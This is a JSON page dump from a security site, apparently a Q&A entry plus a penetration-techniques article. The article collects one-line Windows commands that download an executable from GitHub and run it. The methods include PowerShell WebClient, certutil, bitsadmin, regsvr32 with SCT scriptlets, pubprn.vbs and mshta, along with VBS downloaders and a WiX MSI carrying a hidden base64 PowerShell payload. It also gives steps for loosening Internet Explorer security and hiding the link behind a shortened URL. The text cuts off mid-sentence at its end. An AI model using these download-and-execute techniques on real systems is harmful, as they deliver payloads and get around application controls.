[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fRr8NSPA1k9qwNx9uf9ncj8VNvhjjMmnZyHnY4r3Fwns":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},572,"Why does mshta fail to execute HTA scripts from raw GitHub links, and how can this be bypassed?","Raw GitHub links return a `text\u002Fplain` content type, but mshta expects an HTML response header to parse the script. To bypass this, upload the HTA file to a GitHub blog, which serves it as HTML. Then use `mshta https:\u002F\u002F\u003Cblog-url>\u002Fdownloadexec.hta`. A security pop-up may occur due to cross-domain data access restrictions; this can be mitigated by adding the blog domain to Internet Explorer's trusted sites. This workaround and other methods are explained in [Penetration Techniques - Multiple Methods for Downloading Files from GitHub](\u002Fnews\u002Fpenetration-techniques-multiple-methods-for-downloading-files-from-github).","\u003Cp>Raw GitHub links return a `text\u002Fplain` content type, but mshta expects an HTML response header to parse the script. To bypass this, upload the HTA file to a GitHub blog, which serves it as HTML. Then use `mshta https:\u002F\u002F&lt;blog-url&gt;\u002Fdownloadexec.hta`. A security pop-up may occur due to cross-domain data access restrictions; this can be mitigated by adding the blog domain to Internet Explorer&#39;s trusted sites. This workaround and other methods are explained in [Penetration Techniques - Multiple Methods for Downloading Files from GitHub](\u002Fnews\u002Fpenetration-techniques-multiple-methods-for-downloading-files-from-github).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fpenetration-techniques-multiple-methods-for-downloading-files-from-github\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","why-does-mshta-fail-to-execute-hta-scripts-from-raw-github-links-and-how-can-thi-1777483007748","mshta, HTA, GitHub blog, content type, HTML header, security pop-up, trusted sites",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},140,"Penetration Techniques - Multiple Methods for Downloading Files from GitHub","penetration-techniques-multiple-methods-for-downloading-files-from-github","Explore multiple methods to download and execute files from GitHub via cmd, including PowerShell, certutil, bitsadmin, and regsvr32 techniques.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article originates from an interesting question:\u003C\u002Fp>\u003Cp>Given an exe file: an open-source project\u003C\u002Fp>\u003Cp>Windows environment, requiring the exe to be released to a specified directory and executed, e.g., c:\\download\u003C\u002Fp>\u003Cp>\u003Cstrong>Question:\u003C\u002Fstrong>What is the shortest code in characters to achieve this via cmd?\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Summary of methods for downloading files from GitHub via cmd\u003C\u002Fli>\u003Cli>Selecting the implementation method with the shortest code\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Analysis\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In a previous article titled 'Penetration Techniques - Various Methods of Uploading Files via cmd', a summary of methods for downloading files via the command line was provided.\u003C\u002Fp>\u003Cp>Since GitHub supports the HTTPS protocol but not the HTTP protocol, certain issues need to be considered when utilizing these methods, as some do not support the HTTP protocol.\u003C\u002Fp>\u003Ch2>0x03 Summary of Available Methods\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. PowerShell\u003C\u002Fh3>\u003Cp>powershell (new-object System.Net.WebClient).DownloadFile('some open-source project');start-process 'c:\\download\\a.exe'\u003C\u002Fp>\u003Ch3>2. certutil\u003C\u002Fh3>\u003Cp>certutil -urlcache -split -f some open-source project c:\\download\\a.exe&amp;&amp;c:\\download\\a.exe\u003C\u002Fp>\u003Ch3>3. bitsadmin\u003C\u002Fh3>\u003Cp>bitsadmin \u002Ftransfer n some open-source project c:\\download\\a.exe &amp;&amp; c:\\download\\a.exe\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The download speed using bitsadmin is relatively slow.\u003C\u002Fp>\u003Ch3>4. regsvr32\u003C\u002Fh3>\u003Cp>regsvr32 \u002Fu \u002Fs \u002Fi:https:\u002F\u002Fraw.githubusercontent.some open-source project.sct scrobj.dll\u003C\u002Fp>\u003Cp>\u003Cstrong>Principle:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>regsve32-&gt;JScript-&gt;powershell-&gt;download&amp;exec\u003C\u002Fp>\u003Cp>The code for JScript invoking PowerShell to achieve download and execution is:\u003C\u002Fp>\u003Cp>new ActiveXObject(\"WScript.Shell\").Run(\"powershell (new-object System.Net.WebClient).DownloadFile('some open-source project);start-process 'c:\\\\download\\\\a.exe'\",0,true);\u003C\u002Fp>\u003Cp>Refer to the sct file format:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.some open-source project.sct\u003C\u002Fp>\u003Cp>Add functionality to generate downloadexec.sct\u003C\u002Fp>\u003Cp>\u003Cstrong>Implement functionality:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>regsvr32 \u002Fu \u002Fs \u002Fi:https:\u002F\u002Fraw.githubusercontent.some open-source project.sct scrobj.dll\u003C\u002Fp>\u003Cp>Of course, to reduce the number of invoked programs, the following approach can also be used:\u003C\u002Fp>\u003Cp>regsve32-&gt;VBScript-&gt;download&amp;exec\u003C\u002Fp>\u003Cp>Typically, the download and execution code implemented by vbs script is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Const adTypeBinary = 1\u003Cbr>Const adSaveCreateOverWrite = 2\u003Cbr>Dim http,ado\u003Cbr>Set http = CreateObject(\"Msxml2.XMLHTTP\")\u003Cbr>http.open \"GET\",\"http:\u002F\u002F192.168.81.192\u002Fputty.exe\",False\u003Cbr>http.send\u003Cbr>Set ado = createobject(\"Adodb.Stream\")\u003Cbr>ado.Type = adTypeBinary\u003Cbr>ado.Open\u003Cbr>ado.Write http.responseBody\u003Cbr>ado.SaveToFile \"c:\\download\\a.exe\"\u003Cbr>ado.Close\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>However, this script does not support HTTPS downloads; Msxml2.ServerXMLHTTP.6.0 can be used instead\u003C\u002Fp>\u003Cp>The code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Const adTypeBinary = 1\u003Cbr>Const adSaveCreateOverWrite = 2\u003Cbr>Dim http,ado\u003Cbr>Set http = CreateObject(\"Msxml2.ServerXMLHTTP.6.0\")\u003Cbr>http.SetOption 2, 13056\u003Cbr>http.open \"GET\",\"https:\u002F\u002Fgithub.com\u002F3gstudent\u002Ftest\u002Fraw\u002Fmaster\u002Fputty.exe\",False\u003Cbr>http.send\u003Cbr>Set ado = createobject(\"Adodb.Stream\")\u003Cbr>ado.Type = adTypeBinary\u003Cbr>ado.Open\u003Cbr>ado.Write http.responseBody\u003Cbr>ado.SaveToFile \"c:\\download\\a.exe\"\u003Cbr>ado.Close\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This approach originates from @mosin @SomaliPirate\u003C\u002Fp>\u003Cp>It can also be implemented using WinHttp.WinHttpRequest.5.1, code as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Const adTypeBinary = 1\u003Cbr>Const adSaveCreateOverWrite = 2\u003Cbr>Dim http,ado\u003Cbr>Set http = CreateObject(\"WinHttp.WinHttpRequest.5.1\")\u003Cbr>http.open \"GET\",\"https:\u002F\u002Fgithub.com\u002F3gstudent\u002Ftest\u002Fraw\u002Fmaster\u002Fputty.exe\",False\u003Cbr>http.send\u003Cbr>Set ado = createobject(\"Adodb.Stream\")\u003Cbr>ado.Type = adTypeBinary\u003Cbr>ado.Open\u003Cbr>ado.Write http.responseBody\u003Cbr>ado.SaveToFile \"c:\\download\\a.exe\"\u003Cbr>ado.Close\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This idea comes from @ogre\u003C\u002Fp>\u003Cp>VBS script implementation of execution code\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>WScript.CreateObject(\"WScript.Shell\").Run \"c:\\download\\a.exe\",0,true \u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Still using the sct file as a template, adding functionality to generate downloadexec2.sct\u003C\u002Fp>\u003Cp>\u003Cstrong>Functionality implemented:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>regsvr32 \u002Fu \u002Fs \u002Fi:https:\u002F\u002Fraw.githubusercontent.某开源项目.sct scrobj.dll\u003C\u002Fp>\u003Ch3>5、pubprn.vbs\u003C\u002Fh3>\u003Cp>Using pubprn.vbs enables execution of sct files on remote servers (sct file formats may differ)\u003C\u002Fp>\u003Cp>\u003Cstrong>Approach:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>regsve32-&gt;VBScript-&gt;download&amp;exec\u003C\u002Fp>\u003Cp>Code has been uploaded, address: https:\u002F\u002Fraw.githubusercontent.某开源项目.sct\u003C\u002Fp>\u003Cp>\u003Cstrong>Functionality implemented:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cscript \u002Fb C:\\Windows\\System32\\Printing_Admin_Scripts\\zh-CN\\pubprn.vbs 127.0.0.1 script:https:\u002F\u002Fraw.githubusercontent.某开源项目.sct\u003C\u002Fp>\u003Cp>Alternatively, the following approach can be used (code omitted):\u003C\u002Fp>\u003Cp>regsve32-&gt;JScript-&gt;powershell-&gt;download&amp;exec\u003C\u002Fp>\u003Ch3>6、msiexec\u003C\u002Fh3>\u003Cp>This method was previously introduced in my two articles 'msiexec in Penetration Testing' and 'Penetration Techniques - Switching from Admin to System Privileges', details omitted here\u003C\u002Fp>\u003Cp>First encode the PowerShell download-and-execute code in base64:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$fileContent = \"(new-object System.Net.WebClient).DownloadFile('https:\u002F\u002Fgithub.com\u002F3gstudent\u002Ftest\u002Fraw\u002Fmaster\u002Fputty.exe','c:\\download\\a.exe');start-process 'c:\\download\\a.exe'\"\u003Cbr>$bytes  = [System.Text.Encoding]::Unicode.GetBytes($fileContent);\u003Cbr>$encoded = [System.Convert]::ToBase64String($bytes);\u003Cbr>$encoded\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Result:\u003C\u002Fp>\u003Cp>KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==\u003C\u002Fp>\u003Cp>The complete PowerShell command is:\u003C\u002Fp>\u003Cp>powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==\u003C\u002Fp>\u003Cp>The complete WIX file is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\"?-->\u003Cbr>\u003Cwix xmlns=\"http:\u002F\u002Fschemas.microsoft.com\u002Fwix\u002F2006\u002Fwi\">\u003Cbr>  \u003Cproduct id=\"*\" upgradecode=\"12345678-1234-1234-1234-111111111111\" name=\"Example Product \u003Cbr>Name\" version=\"0.0.1\" manufacturer=\"@_xpn_\" language=\"1033\">\u003Cbr>    \u003Cpackage installerversion=\"200\" compressed=\"yes\" comments=\"Windows Installer Package\">\u003Cbr>    \u003Cmedia id=\"1\">\u003Cbr>\u003Cbr>    \u003Cdirectory id=\"TARGETDIR\" name=\"SourceDir\">\u003Cbr>      \u003Cdirectory id=\"ProgramFilesFolder\">\u003Cbr>        \u003Cdirectory id=\"INSTALLLOCATION\" name=\"Example\">\u003Cbr>          \u003Ccomponent id=\"ApplicationFiles\" guid=\"12345678-1234-1234-1234-222222222222\">     \u003Cbr>          \u003C\u002Fcomponent>\u003Cbr>        \u003C\u002Fdirectory>\u003Cbr>      \u003C\u002Fdirectory>\u003Cbr>    \u003C\u002Fdirectory>\u003Cbr>\u003Cbr>    \u003Cfeature id=\"DefaultFeature\" level=\"1\">\u003Cbr>      \u003Ccomponentref id=\"ApplicationFiles\">\u003Cbr>    \u003C\u002Fcomponentref>\u003C\u002Ffeature>\u003Cbr>\u003Cbr>    \u003Cproperty id=\"cmdline\">powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==\u003Cbr>    \u003C\u002Fproperty>\u003Cbr>\u003Cbr>    \u003Ccustomaction id=\"SystemShell\" execute=\"deferred\" directory=\"TARGETDIR\" \u003Cbr=\"\">ExeCommand='[cmdline]' Return=\"ignore\" Impersonate=\"no\"\u002F&gt;\u003Cbr>\u003Cbr>    \u003Ccustomaction id=\"FailInstall\" execute=\"deferred\" script=\"vbscript\" return=\"check\">\u003Cbr>      invalid vbs to fail install\u003Cbr>    \u003C\u002Fcustomaction>\u003Cbr>\u003Cbr>    \u003Cinstallexecutesequence>\u003Cbr>      \u003Ccustom action=\"SystemShell\" after=\"InstallInitialize\">\u003C\u002Fcustom>\u003Cbr>      \u003Ccustom action=\"FailInstall\" before=\"InstallFiles\">\u003C\u002Fcustom>\u003Cbr>    \u003C\u002Finstallexecutesequence>\u003Cbr>\u003Cbr>  \u003C\u002Fcustomaction>\u003C\u002Fmedia>\u003C\u002Fpackage>\u003C\u002Fproduct>\u003Cbr>\u003C\u002Fwix>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Compile it to generate an msi file with the following commands:\u003C\u002Fp>\u003Cp>candle.exe msigen.wix\u003C\u002Fp>\u003Cp>light.exe msigen.wixobj\u003C\u002Fp>\u003Cp>Generate test.msi\u003C\u002Fp>\u003Cp>\u003Cstrong>Functionality implemented:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>`msiexec \u002Fq \u002Fi an open-source project\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>After execution, manually terminate the process msiexec.exe\u003C\u002Fp>\u003Ch3>7、mshta\u003C\u002Fh3>\u003Cp>mshta supports http and https\u003C\u002Fp>\u003Cp>However, when mshta executes hta scripts, similar to a browser, it performs corresponding parsing operations based on the link's response headers, so it only runs when the response header is html\u003C\u002Fp>\u003Cp>Otherwise, it will be parsed as plain text\u003C\u002Fp>\u003Cp>For code on GitHub, the returned format is text\u002Fplain\u003C\u002Fp>\u003Cp>If executed with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mshta https:\u002F\u002Fraw.githubusercontent.com\u002F3gstudent\u002Ftest\u002Fmaster\u002Fcalc.hta\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>the code will be treated as text and cannot be parsed as html, causing the script to fail to execute\u003C\u002Fp>\u003Cp>But we can change our approach:\u003C\u002Fp>\u003Cp>Upload the hta file to a GitHub blog, and it will be parsed as html, enabling code execution\u003C\u002Fp>\u003Cp>Upload the hta file to a GitHub blog, with the address being https:\u002F\u002Fsome-open-source-project\u002Ftest\u002Fcalc.hta\u003C\u002Fp>\u003Cp>Execute the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mshta https:\u002F\u002F3gstudent.github.io\u002Ftest\u002Fcalc.hta\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Successfully launches the calculator\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This idea comes from DM_\u003C\u002Fp>\u003Cp>Add functionality to achieve download and execution, with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mshta https:\u002F\u002F3gstudent.github.io\u002Ftest\u002Fdownloadexec.hta\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>A pop-up indicates that security settings on this computer prohibit accessing data sources from other domains, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017964712_0_01c0bcfe43.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Solution:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>IE browser - Internet Options - Security\u003C\u002Fp>\u003Cp>Select Trusted Sites, add the blog address: https:\u002F\u002Fanopensourceproject\u002F\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017968528_1_8fa66fe541.jpeg\">\u003C\u002Fp>\u003Cp>Custom Level, find 'Access data sources across domains', select Enable\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017975011_2_a7a31b2e8e.jpeg\">\u003C\u002Fp>\u003Cp>Test again, successfully achieving the download and execution functionality\u003C\u002Fp>\u003Cp>Through the above tests, we found that the IE browser by default blocks download functionality implemented via VBS scripts\u003C\u002Fp>\u003Cp>Therefore, we can boldly speculate that if download and execution are implemented using PowerShell instead, it will not be blocked\u003C\u002Fp>\u003Cp>Modify the script and upload it to GitHub\u003C\u002Fp>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mshta https:\u002F\u002F3gstudent.github.io\u002Ftest\u002Fdownloadexec2.hta\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After testing, this method is usable\u003C\u002Fp>\u003Cp>Use a short URL\u003C\u002Fp>\u003Cp>Interestingly, http:\u002F\u002Fdwz.cn\u002F does not support this domain\u003C\u002Fp>\u003Cp>Switch to another short URL website: http:\u002F\u002Fsina.lt\u002F\u003C\u002Fp>\u003Cp>Generate a short URL, the final command is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mshta http:\u002F\u002Ft.cn\u002FRYUQyF8\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The final shortest character length achieved is 25\u003C\u002Fp>\u003Ch2>0x04 Supplement\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. IEExec\u003C\u002Fh3>\u003Cp>Requires administrator privileges\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>cd C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\\u003Cbr>caspol -s off\u003Cbr>IEExec http:\u002F\u002Fgithub.com\u002F3gstudent\u002Ftest\u002Fraw\u002Fmaster\u002Fputty.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The exe must meet specific format requirements\u003C\u002Fp>\u003Cp>For details, refer to:\u003C\u002Fp>\u003Cp>https:\u002F\u002Froom362.com\u002Fpost\u002F2014\u002F2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe\u002F\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>I failed to reproduce this on Windows 7\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article summarizes methods for downloading files from GitHub via cmd, with the shortest implementation being mshta http:\u002F\u002Ft.cn\u002FRYUQyF8\u003C\u002Fp>\u003Cp>The minimum character length achieved is 25\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article originates from an interesting question:\u003C\u002Fp>\u003Cp>Given an exe file: an open-source project\u003C\u002Fp>\u003Cp>Windows environment, requiring the exe to be released to a specified directory and executed, e.g., c:\\download\u003C\u002Fp>\u003Cp>\u003Cstrong>Question:\u003C\u002Fstrong>What is the shortest code in characters to achieve this via cmd?\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Summary of methods for downloading files from GitHub via cmd\u003C\u002Fli>\u003Cli>Selecting the implementation method with the shortest code\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Analysis\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In a previous article titled 'Penetration Techniques - Various Methods of Uploading Files via cmd', a summary of methods for downloading files via the command line was provided.\u003C\u002Fp>\u003Cp>Since GitHub supports the HTTPS protocol but not the HTTP protocol, certain issues need to be considered when utilizing these methods, as some do not support the HTTP protocol.\u003C\u002Fp>\u003Ch2>0x03 Summary of Available Methods\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. PowerShell\u003C\u002Fh3>\u003Cp>powershell (new-object System.Net.WebClient).DownloadFile('some open-source project');start-process 'c:\\download\\a.exe'\u003C\u002Fp>\u003Ch3>2. certutil\u003C\u002Fh3>\u003Cp>certutil -urlcache -split -f some open-source project c:\\download\\a.exe&amp;&amp;c:\\download\\a.exe\u003C\u002Fp>\u003Ch3>3. bitsadmin\u003C\u002Fh3>\u003Cp>bitsadmin \u002Ftransfer n some open-source project c:\\download\\a.exe &amp;&amp; c:\\download\\a.exe\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The download speed using bitsadmin is relatively slow.\u003C\u002Fp>\u003Ch3>4. regsvr32\u003C\u002Fh3>\u003Cp>regsvr32 \u002Fu \u002Fs \u002Fi:https:\u002F\u002Fraw.githubusercontent.some open-source project.sct scrobj.dll\u003C\u002Fp>\u003Cp>\u003Cstrong>Principle:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>regsve32-&gt;JScript-&gt;powershell-&gt;download&amp;exec\u003C\u002Fp>\u003Cp>The code for JScript invoking PowerShell to achieve download and execution is:\u003C\u002Fp>\u003Cp>new ActiveXObject(\"WScript.Shell\").Run(\"powershell (new-object System.Net.WebClient).DownloadFile('some open-source project);start-process 'c:\\\\download\\\\a.exe'\",0,true);\u003C\u002Fp>\u003Cp>Refer to the sct file format:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.some open-source project.sct\u003C\u002Fp>\u003Cp>Add functionality to generate downloadexec.sct\u003C\u002Fp>\u003Cp>\u003Cstrong>Implement functionality:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>regsvr32 \u002Fu \u002Fs \u002Fi:https:\u002F\u002Fraw.githubusercontent.some open-source project.sct scrobj.dll\u003C\u002Fp>\u003Cp>Of course, to reduce the number of invoked programs, the following approach can also be used:\u003C\u002Fp>\u003Cp>regsve32-&gt;VBScript-&gt;download&amp;exec\u003C\u002Fp>\u003Cp>Typically, the download and execution code implemented by vbs script is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Const adTypeBinary = 1\u003Cbr>Const adSaveCreateOverWrite = 2\u003Cbr>Dim http,ado\u003Cbr>Set http = CreateObject(\"Msxml2.XMLHTTP\")\u003Cbr>http.open \"GET\",\"http:\u002F\u002F192.168.81.192\u002Fputty.exe\",False\u003Cbr>http.send\u003Cbr>Set ado = createobject(\"Adodb.Stream\")\u003Cbr>ado.Type = adTypeBinary\u003Cbr>ado.Open\u003Cbr>ado.Write http.responseBody\u003Cbr>ado.SaveToFile \"c:\\download\\a.exe\"\u003Cbr>ado.Close\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>However, this script does not support HTTPS downloads; Msxml2.ServerXMLHTTP.6.0 can be used instead\u003C\u002Fp>\u003Cp>The code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Const adTypeBinary = 1\u003Cbr>Const adSaveCreateOverWrite = 2\u003Cbr>Dim http,ado\u003Cbr>Set http = CreateObject(\"Msxml2.ServerXMLHTTP.6.0\")\u003Cbr>http.SetOption 2, 13056\u003Cbr>http.open \"GET\",\"https:\u002F\u002Fgithub.com\u002F3gstudent\u002Ftest\u002Fraw\u002Fmaster\u002Fputty.exe\",False\u003Cbr>http.send\u003Cbr>Set ado = createobject(\"Adodb.Stream\")\u003Cbr>ado.Type = adTypeBinary\u003Cbr>ado.Open\u003Cbr>ado.Write http.responseBody\u003Cbr>ado.SaveToFile \"c:\\download\\a.exe\"\u003Cbr>ado.Close\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This approach originates from @mosin @SomaliPirate\u003C\u002Fp>\u003Cp>It can also be implemented using WinHttp.WinHttpRequest.5.1, code as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Const adTypeBinary = 1\u003Cbr>Const adSaveCreateOverWrite = 2\u003Cbr>Dim http,ado\u003Cbr>Set http = CreateObject(\"WinHttp.WinHttpRequest.5.1\")\u003Cbr>http.open \"GET\",\"https:\u002F\u002Fgithub.com\u002F3gstudent\u002Ftest\u002Fraw\u002Fmaster\u002Fputty.exe\",False\u003Cbr>http.send\u003Cbr>Set ado = createobject(\"Adodb.Stream\")\u003Cbr>ado.Type = adTypeBinary\u003Cbr>ado.Open\u003Cbr>ado.Write http.responseBody\u003Cbr>ado.SaveToFile \"c:\\download\\a.exe\"\u003Cbr>ado.Close\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This idea comes from @ogre\u003C\u002Fp>\u003Cp>VBS script implementation of execution 